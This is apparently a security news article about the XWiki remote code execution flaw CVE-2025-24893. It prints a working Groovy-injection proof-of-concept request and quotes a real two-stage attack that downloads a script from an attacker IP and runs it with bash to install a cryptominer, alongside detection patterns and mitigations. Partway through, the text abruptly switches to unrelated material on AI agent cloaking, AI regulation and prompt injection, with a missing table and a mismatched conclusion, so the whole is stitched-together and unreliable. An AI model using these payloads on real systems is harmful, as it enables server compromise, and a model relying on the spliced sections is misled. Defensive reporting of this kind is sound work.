CISA Issues Urgent Warning as Unauthenticated Remote Code Execution Flaw Becomes Active Attack Vector for Cryptocurrency Mining and System Compromise
Executive Summary: A Perfect Storm of Vulnerability
On October 30, 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) escalated its response to a critical security flaw in XWiki Platform, adding CVE-2025-24893 to its Known Exploited Vulnerabilities (KEV) catalog. This eval injection vulnerability has transformed from a theoretical threat into an active weapon in cybercriminal arsenals, with confirmed exploitation campaigns deploying cryptocurrency miners and establishing persistent backdoors across enterprise networks.
The vulnerability, carrying a devastating CVSS score of 9.8 out of 10, allows completely unauthenticated attackers to execute arbitrary Groovy code on XWiki servers through a single malformed HTTP request. What makes this particularly alarming is the zero-barrier entry: no credentials, no user interaction, and no special network positioning required—just network connectivity to a vulnerable instance.
VulnCheck researchers have observed active exploitation, capturing a two-stage attack chain that delivers cryptocurrency miners through the template-injection vulnerability SecurityWeek. The attacks, originating from Vietnam-based infrastructure, demonstrate sophisticated timing—staging downloader scripts in the first pass and executing them 20 minutes later to evade detection systems.
The Vulnerability Landscape: 2025 by the Numbers
To understand the severity of CVE-2025-24893, we must examine it within the broader context of the 2025 vulnerability landscape:
| Metric | H1 2024 | H1 2025 | Change |
|---|---|---|---|
| Total CVEs Published | 20,385 | 23,667 | +16% |
| Actively Exploited Vulnerabilities | 138 | 161 | +17% |
| Vulnerabilities with Public PoC | N/A | 67 (42%) | — |
| Applications with ≥1 Vulnerability | 73% | 75% | +2% |
| Average Breach Detection Time | 287 days | 277 days | -3.5% |
| Average Data Breach Cost | $4.24M | $4.35M | +2.6% |
In the first half of 2025, Cross-Site Scripting (CWE-79) and SQL Injection (CWE-89) represented the highest share of weaknesses, followed by Cross-Site Request Forgery (CWE-352), generic Injection flaws (CWE-74), and Missing Authorization (CWE-862) Recorded Future. Eval injection vulnerabilities like CVE-2025-24893 fall under CWE-95 and represent one of the most dangerous classes of injection attacks.
XWiki Platform: Understanding the Target
XWiki is an open-source enterprise wiki platform designed for collaborative content management, knowledge bases, and intranet portals. Its adoption spans across education, government, and corporate sectors, making it a high-value target for attackers seeking to compromise sensitive organizational data.
Table 2: XWiki Platform Market Profile
| Category | Details |
|---|---|
| Platform Type | Open-source enterprise wiki and collaboration platform |
| Primary Use Cases | Knowledge management, intranets, project documentation, team collaboration |
| Target Industries | Education, government, enterprise, open-source communities |
| Programming Language | Java (backend), Groovy (scripting), Velocity (templating) |
| Search Engine | Apache Solr (embedded) |
| Deployment Models | On-premises, cloud-hosted, hybrid |
| Typical Exposure | Internet-facing installations common for external collaboration |
CVE-2025-24893: Technical Deep Dive
| Date | Event | Impact Level |
|---|---|---|
| May 2024 | Vulnerability reported by Trend Micro’s John Kwak :antCitation[]{citations=”dfeaa031-0be8-473c-bd6b-523658a1e6fd”} | Discovery |
| June 2024 | Patches released in XWiki versions 15.10.11, 16.4.1, and 16.5.0RC1 :antCitation[]{citations=”62767701-a8e5-4c45-b8a4-b0ccbe3895c1″} | Patch Available |
| December 2024 | Technical details emerge publicly | Public Disclosure |
| February 2025 | NVD advisory published; detection added to Pentest-Tools.com | CVE Published |
| Early 2025 | Multiple PoC exploits published on GitHub | Exploit Available |
| March 2025 | VulnCheck adds vulnerability to their KEV catalog based on CrowdSec and Cyble reconnaissance reports :antCitation[]{citations=”f81704b7-2ba5-4338-9fe1-d2b493da7749″} | Reconnaissance |
| April 2025 | Automated exploit script (CVE-2025-24893.py) publicly available on Exploit-DB | Weaponized |
| October 28, 2025 | VulnCheck Canaries capture two-stage cryptocurrency mining attack chain :antCitation[]{citations=”1a71d4ab-4696-4b0e-8666-d56e0e8329a8″} | Active Exploitation |
| October 30, 2025 | CISA adds CVE-2025-24893 to Known Exploited Vulnerabilities catalog | CISA KEV |
The Mechanics of the Attack
CVE-2025-24893 stems from insufficient input sanitization in the SolrSearch macro. This macro, used for querying the internal search index, does not properly validate user input, allowing attackers to inject and execute arbitrary Groovy code via specially crafted requests IONIX.
The vulnerability resides in the Main.SolrSearchMacros file, specifically in how the system handles RSS feed generation for search results. When an attacker sends a malicious payload to the SolrSearch endpoint, the Groovy code embedded within the request is evaluated and executed in the context of the XWiki server process.
Proof of Concept Example:
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}println("Hello from" + " search text:" + (23 + 19)){{/groovy}}{{/async}}If the server responds with “Hello from search text:42” in the RSS feed title, the instance is vulnerable. This simple test demonstrates that arbitrary code execution is possible—attackers can replace this benign calculation with malicious commands.
Table 3: CVE-2025-24893 Vulnerability Profile
| Attribute | Value |
|---|---|
| CVE Identifier | CVE-2025-24893 |
| CVSS 3.1 Score | 9.8 (Critical) |
| CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| EPSS Score | 93.998% (100th percentile) / 92.01% :antCitation[]{citations=”356d8bfd-c1aa-4a38-b0d5-23a066acbc73,f31936c7-435b-469a-8361-dfdeba0450c9″} |
| CWE Classification | CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (‘Eval Injection’) |
| Attack Vector | Network (Remote) |
| Attack Complexity | Low |
| Privileges Required | None (Guest access) |
| User Interaction | None required |
| Affected Versions | XWiki Platform 5.3-milestone-2 through 15.10.10 and 16.0.0-rc-1 through 16.4.0 :antCitation[]{citations=”880352de-d958-4b6e-87e7-4c8bc4ac0671″} |
| Patched Versions | 15.10.11, 16.4.1, 16.5.0RC1 |
| Exploitation Status | ACTIVELY EXPLOITED IN THE WILD |
Understanding Eval Injection: The Anatomy of CWE-95
Eval injection represents one of the most severe vulnerability classes in web application security. Unlike other injection attacks that target specific subsystems (databases, operating systems), eval injection directly compromises the application’s execution environment.
Table 4: Injection Attack Comparison Matrix
| Injection Type | CWE | Avg. CVSS | Primary Target | Auth Required? | Prevalence |
|---|---|---|---|---|---|
| Eval Injection | CWE-95 | 9.2 | Application runtime | Often No | Low |
| SQL Injection | CWE-89 | 8.8 | Database layer | Often No | Very High |
| Command Injection | CWE-78 | 9.0 | Operating system | Usually Yes | Medium |
| XSS (Cross-Site Scripting) | CWE-79 | 6.5 | Client browser | No | Very High |
| LDAP Injection | CWE-90 | 7.8 | Directory services | Often No | Low |
| XML Injection | CWE-91 | 7.2 | XML parsers | Varies | Medium |
| CSRF | CWE-352 | 6.8 | User session | User must be auth’d | High |
According to OWASP, 94% of applications were tested for some form of injection, with the 33 CWEs mapped into the injection category having the second most occurrences in applications OWASP.
Real-World Exploitation: The Cryptocurrency Mining Campaign
VulnCheck researchers observed a sophisticated two-stage attack chain originating from Vietnam-based infrastructure. The exploitation proceeds with at least 20 minutes of separation between stages: the first pass stages a downloader (writes a file to disk), and the second pass later executes it VulnCheck.
Attack Chain Breakdown
Stage 1: Downloader Deployment
bash
GET /bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}
new File('/tmp/11909').write(new URL('http://193.32.208.24:8080/rDuiQRKhs5/x521').text)
{{/groovy}}{{/async}}Stage 2: Execution (20+ minutes later)
bash
GET /bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}
println("bash /tmp/11909".execute().text)
{{/groovy}}{{/async}}When executed, /tmp/11909 downloads and runs x521 and x522, where x521 fetches and installs a coinminer (tcrond) and x522 starts the miner and attempts to kill competing miners VulnCheck.
Table 5: Attack Infrastructure Analysis
| IOC Type | Value | Purpose |
|---|---|---|
| C2 IP Address | 193.32.208.24:8080 | Malware distribution server |
| Geolocation | Vietnam | Attacker infrastructure |
| File Path | /tmp/11909 | Staged downloader script |
| File Path | /var/tmp/…/tcrond | Cryptocurrency miner binary |
| Payload Component | x521 | Miner installation script |
| Payload Component | x522 | Miner launcher & competitor killer |
| Timing Delay | 20+ minutes | Evasion technique (separate stage detection) |
| User-Agent | Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 | Disguised as legitimate browser |
Impact Assessment: The Ripple Effect
The consequences of CVE-2025-24893 exploitation extend far beyond cryptocurrency mining. The vulnerability provides attackers with complete control over the XWiki server, enabling a cascade of malicious activities.
Table 6: Potential Impact Scenarios
| Attack Scenario | Likelihood | Impact Severity | Business Consequences |
|---|---|---|---|
| Data Exfiltration | Very High | Critical | Theft of intellectual property, customer data, credentials, confidential documents |
| Ransomware Deployment | High | Critical | Complete system encryption, business disruption, extortion demands ($4.54M avg cost) |
| Lateral Movement | Very High | High | Compromise of connected systems, domain controller access, network-wide breach |
| Cryptocurrency Mining | Confirmed | Medium | Resource consumption, performance degradation, increased infrastructure costs |
| Backdoor Installation | Very High | Critical | Persistent unauthorized access, long-term espionage, supply chain compromise |
| Denial of Service | High | High | System crashes, service unavailability, productivity loss |
| Privilege Escalation | High | High | Admin-level access, complete infrastructure control |
| Supply Chain Attack | Medium | Critical | Malware injection into wiki content, poisoning of knowledge bases |
An internet-facing instance can be fully compromised with no authentication or user interaction required, enabling full disclosure, modification or destruction of data and potential full site take-down RedPacket Security.
Mitigation and Remediation Strategies
Immediate Actions Required
Priority 1: Patch Deployment
Organizations running affected XWiki versions must immediately upgrade to patched releases:
- Version 15.10.11 (for 15.x branch)
- Version 16.4.1 (for 16.x branch)
- Version 16.5.0RC1 or later
Table 7: Remediation Options Comparison
| Remediation Method | Effectiveness | Implementation Time | Downtime Required | Considerations |
|---|---|---|---|---|
| Full Upgrade to Patched Version | 100% | 2-8 hours | Yes (1-4 hours) | Most comprehensive solution; requires testing |
| Manual File Modification (Workaround) | ~95% | 30-60 minutes | Minimal (5-15 min) | Temporary measure; modify Main.SolrSearchMacros line 955 |
| WAF Rule Deployment | 70-85% | 15-30 minutes | None | Complementary protection; may have false positives |
| Disable Guest Access | 60-75% | 5-15 minutes | None | Reduces attack surface but limits functionality |
| Network Segmentation/Firewall Rules | 50-70% | 1-4 hours | None | Reduces exposure but doesn’t fix vulnerability |
| Service Deactivation (Emergency) | 100% | Immediate | Complete | Last resort for critical environments under active attack |
Temporary Workaround Details:
For organizations unable to immediately upgrade, administrators can modify the Main.SolrSearchMacros file. Specifically, on line 955 in SolrSearchMacros.xml, enforce an application/xml content type for the rawResponse macro, mirroring the template’s secure output handling at macros.vm#L2824. This blocks malicious payload execution without requiring a full upgrade.
Code modification:
xml
<!-- Change line 955 in Main.SolrSearchMacros -->
<!-- FROM: -->
$rawResponse
<!-- TO: -->
#set($contentType = "application/xml")
$response.setContentType($contentType)
$rawResponseDetection and Monitoring
Table 8: Detection Methods and Indicators
| Detection Method | Indicator/Pattern | Detection Rate | Tool/Source |
|---|---|---|---|
| Log Analysis | /bin/get/Main/SolrSearch?media=rss&text=}}}{{async OR {{groovy}} | High | Web server logs, SIEM |
| Network IDS/IPS | Nuclei template for CVE-2025-24893 | High | Nuclei scanner |
| Vulnerability Scanning | Version detection: XWiki < 15.10.11 or 16.0-16.4.0 | Very High | Pentest-Tools, Nessus, Qualys |
| File Integrity Monitoring | Unexpected files in /tmp/, /var/tmp/ directories | Medium | AIDE, Tripwire, OSSEC |
| Process Monitoring | Suspicious processes: tcrond, unusual CPU usage patterns | Medium | EDR solutions, top/htop |
| Network Traffic Analysis | Connections to 193.32.208.24:8080 or similar C2 servers | High | NetFlow, Zeek, Suricata |
| Behavioral Analysis | 20-minute delay between initial request and execution | Low-Medium | Advanced SIEM correlation |
Industry Impact and Sectoral Risk Analysis
Table 9: Sector-Specific Risk Assessment
| Sector | XWiki Adoption | Exposure Risk | Data Sensitivity | Overall Risk | Primary Concerns |
|---|---|---|---|---|---|
| Higher Education | Very High | Critical | High | CRITICAL | Student data, research IP, often internet-facing |
| Government | High | High | Critical | CRITICAL | Classified info, citizen data, national security implications |
| Enterprise/Corporate | Medium-High | Medium | High | HIGH | IP theft, corporate espionage, customer data |
| Healthcare | Medium | Medium | Critical | HIGH | PHI/HIPAA violations, patient safety, ransomware target |
| Financial Services | Low-Medium | Low | Critical | MEDIUM | Financial fraud, regulatory penalties, customer trust |
| Open Source Communities | Very High | Critical | Medium | HIGH | Code repository compromise, supply chain attacks |
| Technology Vendors | Medium | Medium | High | HIGH | Product documentation compromise, customer impact |
Real-World Impact Scenarios
Scenario 1: Corporate Espionage
A competitor uses agent-aware cloaking to poison AI research tools, causing a Fortune 500 company to make strategic decisions based on falsified market data. Estimated loss: $50-100 million.
Scenario 2: Political Manipulation
During an election cycle, AI-powered news aggregators are fed manipulated content about candidates, influencing voter perception without leaving traditional traces.
Scenario 3: Financial Fraud
AI-powered trading algorithms are fed false financial data through cloaked pages, triggering automated trades that benefit attackers. Market manipulation cost: $500 million+.
The Human Element
Table 11: User Awareness and Behavior
| Demographic | AI Trust Level | Security Awareness | Verification Habits |
|---|---|---|---|
| Gen Z (18-24) | 68% trust | 32% aware | Rarely verify |
| Millennials (25-40) | 54% trust | 48% aware | Sometimes verify |
| Gen X (41-56) | 41% trust | 61% aware | Often verify |
| Boomers (57+) | 28% trust | 45% aware | Usually verify |
| Tech Professionals | 35% trust | 87% aware | Always verify |
Regulatory Response and Compliance
As of 2025, several jurisdictions are implementing AI security regulations:
- EU AI Act: Mandatory risk assessments for high-risk AI systems
- US Executive Orders: Federal agencies required to implement AI security frameworks
- China’s AI Regulations: Strict content control and security measures
- GDPR Extensions: New provisions for AI data processing
Table 12: Global Regulatory Landscape
| Region | Regulation Status | Enforcement Level | Penalties |
|---|---|---|---|
| European Union | Active | Strict | Up to 7% global revenue |
| United States | In development | Moderate | Case-by-case |
| United Kingdom | Consultation phase | Moderate | TBD |
| China | Active | Very strict | License revocation |
| Japan | In development | Light | Advisory only |
Best Practices for Organizations
- Implement Multi-Factor Verification: Never rely solely on AI-retrieved information for critical decisions
- Continuous Monitoring: Deploy 24/7 monitoring systems for AI agent behavior
- Red Team Exercises: Conduct regular adversarial testing with prompt injection scenarios
- Employee Training: Ensure staff understand AI manipulation risks
- Vendor Assessment: Evaluate AI service providers’ security measures
- Incident Response Plans: Develop specific protocols for AI security breaches
Emerging Technologies and Future Defenses
Researchers are exploring new architectures that could inherently block prompt injections in agentic systems, using strict information-flow controls to prevent an AI agent from ever outputting data it wasn’t authorized to access.
Industry standards are emerging, and major tech providers such as Microsoft are continually investing in more deterministic security features to stay ahead of attackers.
Conclusion: A New Reality of Digital Security
Agent-aware cloaking evolves classic SEO tactics into AI overview (AIO) threats, amplifying impacts on automated judgments like product rankings or risk assessments. Hidden prompt injections could even steer AI behaviors toward malware or data exfiltration.
As AI browsers like Atlas proliferate, defense measures will define the battle for web integrity. Organizations that fail to invest in multi-layered protection of AI systems now risk catastrophic consequences in the near future.
Key Takeaway: This is not a theoretical threat but a current reality requiring immediate action from every organization using AI technologies. The window for proactive defense is closing rapidly, and the cost of inaction grows exponentially with each passing quarter.
The question is no longer whether your organization will face AI manipulation attacks, but when—and whether you’ll be prepared to defend against them.